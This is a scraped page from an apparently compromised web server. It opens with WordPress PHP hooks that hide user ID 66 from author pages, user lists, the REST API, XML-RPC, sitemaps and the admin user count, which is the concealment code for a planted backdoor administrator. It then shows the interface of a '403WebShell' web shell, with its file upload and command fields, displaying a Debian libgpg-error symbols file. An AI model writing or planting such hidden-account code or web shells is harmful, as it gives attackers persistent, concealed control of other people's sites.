add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/libgpg-error0:arm64.symbols
libgpg-error.so.0 libgpg-error0 #MINVER#
* Build-Depends-Package: libgpg-error-dev
 GPG_ERROR_1.0@GPG_ERROR_1.0 1.14
 _gpgrt_get_std_stream@GPG_ERROR_1.0 1.14
 _gpgrt_getc_underflow@GPG_ERROR_1.0 1.14
 _gpgrt_log_assert@GPG_ERROR_1.0 1.28
 _gpgrt_pending@GPG_ERROR_1.0 1.17
 _gpgrt_pending_unlocked@GPG_ERROR_1.0 1.17
 _gpgrt_putc_overflow@GPG_ERROR_1.0 1.14
 _gpgrt_set_std_fd@GPG_ERROR_1.0 1.14
 gpg_err_code_from_errno@GPG_ERROR_1.0 1.14
 gpg_err_code_from_syserror@GPG_ERROR_1.0 1.14
 gpg_err_code_to_errno@GPG_ERROR_1.0 1.14
 gpg_err_deinit@GPG_ERROR_1.0 1.14
 gpg_err_init@GPG_ERROR_1.0 1.14
 gpg_err_set_errno@GPG_ERROR_1.0 1.14
 gpg_error_check_version@GPG_ERROR_1.0 1.14
 gpg_strerror@GPG_ERROR_1.0 1.14
 gpg_strerror_r@GPG_ERROR_1.0 1.14
 gpg_strsource@GPG_ERROR_1.0 1.14
 gpgrt_abort@GPG_ERROR_1.0 1.34
 gpgrt_absfnameconcat@GPG_ERROR_1.0 1.38
 gpgrt_access@GPG_ERROR_1.0 1.42
 gpgrt_add_emergency_cleanup@GPG_ERROR_1.0 1.34
 gpgrt_argparse@GPG_ERROR_1.0 1.29
 gpgrt_argparser@GPG_ERROR_1.0 1.38
 gpgrt_asprintf@GPG_ERROR_1.0 1.14
 gpgrt_b64dec_finish@GPG_ERROR_1.0 1.27
 gpgrt_b64dec_proc@GPG_ERROR_1.0 1.27
 gpgrt_b64dec_start@GPG_ERROR_1.0 1.27
 gpgrt_b64enc_finish@GPG_ERROR_1.0 1.29
 gpgrt_b64enc_start@GPG_ERROR_1.0 1.29
 gpgrt_b64enc_write@GPG_ERROR_1.0 1.29
 gpgrt_bsprintf@GPG_ERROR_1.0 1.14
 gpgrt_calloc@GPG_ERROR_1.0 1.28
 gpgrt_chdir@GPG_ERROR_1.0 1.28
 gpgrt_check_version@GPG_ERROR_1.0 1.14
 gpgrt_clearerr@GPG_ERROR_1.0 1.14
 gpgrt_clearerr_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_cmp_version@GPG_ERROR_1.0 1.33
 gpgrt_fcancel@GPG_ERROR_1.0 1.42
 gpgrt_fclose@GPG_ERROR_1.0 1.14
 gpgrt_fclose_snatch@GPG_ERROR_1.0 1.14
 gpgrt_fdopen@GPG_ERROR_1.0 1.14
 gpgrt_fdopen_nc@GPG_ERROR_1.0 1.14
 gpgrt_feof@GPG_ERROR_1.0 1.14
 gpgrt_feof_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_ferror@GPG_ERROR_1.0 1.14
 gpgrt_ferror_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_fflush@GPG_ERROR_1.0 1.14
 gpgrt_fgetc@GPG_ERROR_1.0 1.14
 gpgrt_fgets@GPG_ERROR_1.0 1.14
 gpgrt_fileno@GPG_ERROR_1.0 1.14
 gpgrt_fileno_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_flockfile@GPG_ERROR_1.0 1.14
 gpgrt_fname_get@GPG_ERROR_1.0 1.14
 gpgrt_fname_set@GPG_ERROR_1.0 1.14
 gpgrt_fnameconcat@GPG_ERROR_1.0 1.38
 gpgrt_fopen@GPG_ERROR_1.0 1.14
 gpgrt_fopencookie@GPG_ERROR_1.0 1.14
 gpgrt_fopenmem@GPG_ERROR_1.0 1.14
 gpgrt_fopenmem_init@GPG_ERROR_1.0 1.14
 gpgrt_fpopen@GPG_ERROR_1.0 1.14
 gpgrt_fpopen_nc@GPG_ERROR_1.0 1.14
 gpgrt_fprintf@GPG_ERROR_1.0 1.14
 gpgrt_fprintf_sf@GPG_ERROR_1.0 1.33
 gpgrt_fprintf_sf_unlocked@GPG_ERROR_1.0 1.33
 gpgrt_fprintf_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_fputc@GPG_ERROR_1.0 1.14
 gpgrt_fputs@GPG_ERROR_1.0 1.14
 gpgrt_fputs_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_fread@GPG_ERROR_1.0 1.14
 gpgrt_free@GPG_ERROR_1.0 1.14
 gpgrt_freopen@GPG_ERROR_1.0 1.14
 gpgrt_fseek@GPG_ERROR_1.0 1.14
 gpgrt_fseeko@GPG_ERROR_1.0 1.14
 gpgrt_ftell@GPG_ERROR_1.0 1.14
 gpgrt_ftello@GPG_ERROR_1.0 1.14
 gpgrt_ftruncate@GPG_ERROR_1.0 1.33
 gpgrt_ftrylockfile@GPG_ERROR_1.0 1.14
 gpgrt_funlockfile@GPG_ERROR_1.0 1.14
 gpgrt_fwrite@GPG_ERROR_1.0 1.14
 gpgrt_get_errorcount@GPG_ERROR_1.0 1.28
 gpgrt_get_nonblock@GPG_ERROR_1.0 1.21
 gpgrt_get_syscall_clamp@GPG_ERROR_1.0 1.25
 gpgrt_getcwd@GPG_ERROR_1.0 1.28
 gpgrt_getenv@GPG_ERROR_1.0 1.28
 gpgrt_getline@GPG_ERROR_1.0 1.14
 gpgrt_inc_errorcount@GPG_ERROR_1.0 1.28
 gpgrt_lock_destroy@GPG_ERROR_1.0 1.14
 gpgrt_lock_init@GPG_ERROR_1.0 1.14
 gpgrt_lock_lock@GPG_ERROR_1.0 1.14
 gpgrt_lock_trylock@GPG_ERROR_1.0 1.14
 gpgrt_lock_unlock@GPG_ERROR_1.0 1.14
 gpgrt_log@GPG_ERROR_1.0 1.28
 gpgrt_log_bug@GPG_ERROR_1.0 1.28
 gpgrt_log_clock@GPG_ERROR_1.0 1.28
 gpgrt_log_debug@GPG_ERROR_1.0 1.28
 gpgrt_log_debug_string@GPG_ERROR_1.0 1.28
 gpgrt_log_error@GPG_ERROR_1.0 1.28
 gpgrt_log_fatal@GPG_ERROR_1.0 1.28
 gpgrt_log_flush@GPG_ERROR_1.0 1.28
 gpgrt_log_get_fd@GPG_ERROR_1.0 1.28
 gpgrt_log_get_prefix@GPG_ERROR_1.0 1.28
 gpgrt_log_get_stream@GPG_ERROR_1.0 1.28
 gpgrt_log_info@GPG_ERROR_1.0 1.28
 gpgrt_log_printf@GPG_ERROR_1.0 1.28
 gpgrt_log_printhex@GPG_ERROR_1.0 1.28
 gpgrt_log_set_pid_suffix_cb@GPG_ERROR_1.0 1.28
 gpgrt_log_set_prefix@GPG_ERROR_1.0 1.28
 gpgrt_log_set_sink@GPG_ERROR_1.0 1.28
 gpgrt_log_set_socket_dir_cb@GPG_ERROR_1.0 1.28
 gpgrt_log_string@GPG_ERROR_1.0 1.28
 gpgrt_log_test_fd@GPG_ERROR_1.0 1.28
 gpgrt_logv@GPG_ERROR_1.0 1.28
 gpgrt_logv_prefix@GPG_ERROR_1.0 1.28
 gpgrt_malloc@GPG_ERROR_1.0 1.28
 gpgrt_mkdir@GPG_ERROR_1.0 1.28
 gpgrt_mopen@GPG_ERROR_1.0 1.14
 gpgrt_onclose@GPG_ERROR_1.0 1.14
 gpgrt_opaque_get@GPG_ERROR_1.0 1.14
 gpgrt_opaque_set@GPG_ERROR_1.0 1.14
 gpgrt_poll@GPG_ERROR_1.0 1.21
 gpgrt_printf@GPG_ERROR_1.0 1.14
 gpgrt_printf_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_read@GPG_ERROR_1.0 1.14
 gpgrt_read_line@GPG_ERROR_1.0 1.14
 gpgrt_realloc@GPG_ERROR_1.0 1.28
 gpgrt_reallocarray@GPG_ERROR_1.0 1.38
 gpgrt_rewind@GPG_ERROR_1.0 1.14
 gpgrt_set_alloc_func@GPG_ERROR_1.0 1.14
 gpgrt_set_binary@GPG_ERROR_1.0 1.14
 gpgrt_set_confdir@GPG_ERROR_1.0 1.38
 gpgrt_set_fixed_string_mapper@GPG_ERROR_1.0 1.29
 gpgrt_set_nonblock@GPG_ERROR_1.0 1.21
 gpgrt_set_strusage@GPG_ERROR_1.0 1.29
 gpgrt_set_syscall_clamp@GPG_ERROR_1.0 1.14
 gpgrt_set_usage_outfnc@GPG_ERROR_1.0 1.29
 gpgrt_setbuf@GPG_ERROR_1.0 1.14
 gpgrt_setenv@GPG_ERROR_1.0 1.28
 gpgrt_setvbuf@GPG_ERROR_1.0 1.14
 gpgrt_snprintf@GPG_ERROR_1.0 1.14
 gpgrt_strconcat@GPG_ERROR_1.0 1.28
 gpgrt_strdup@GPG_ERROR_1.0 1.28
 gpgrt_strusage@GPG_ERROR_1.0 1.29
 gpgrt_syshd@GPG_ERROR_1.0 1.14
 gpgrt_syshd_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_sysopen@GPG_ERROR_1.0 1.14
 gpgrt_sysopen_nc@GPG_ERROR_1.0 1.14
 gpgrt_tmpfile@GPG_ERROR_1.0 1.14
 gpgrt_ungetc@GPG_ERROR_1.0 1.14
 gpgrt_usage@GPG_ERROR_1.0 1.29
 gpgrt_vasprintf@GPG_ERROR_1.0 1.14
 gpgrt_vbsprintf@GPG_ERROR_1.0 1.14
 gpgrt_vfprintf@GPG_ERROR_1.0 1.14
 gpgrt_vfprintf_unlocked@GPG_ERROR_1.0 1.14
 gpgrt_vsnprintf@GPG_ERROR_1.0 1.14
 gpgrt_write@GPG_ERROR_1.0 1.14
 gpgrt_write_hexstring@GPG_ERROR_1.0 1.14
 gpgrt_write_sanitized@GPG_ERROR_1.0 1.14
 gpgrt_yield@GPG_ERROR_1.0 1.25

Youez - 2016 - github.com/yon3zu
LinuXploit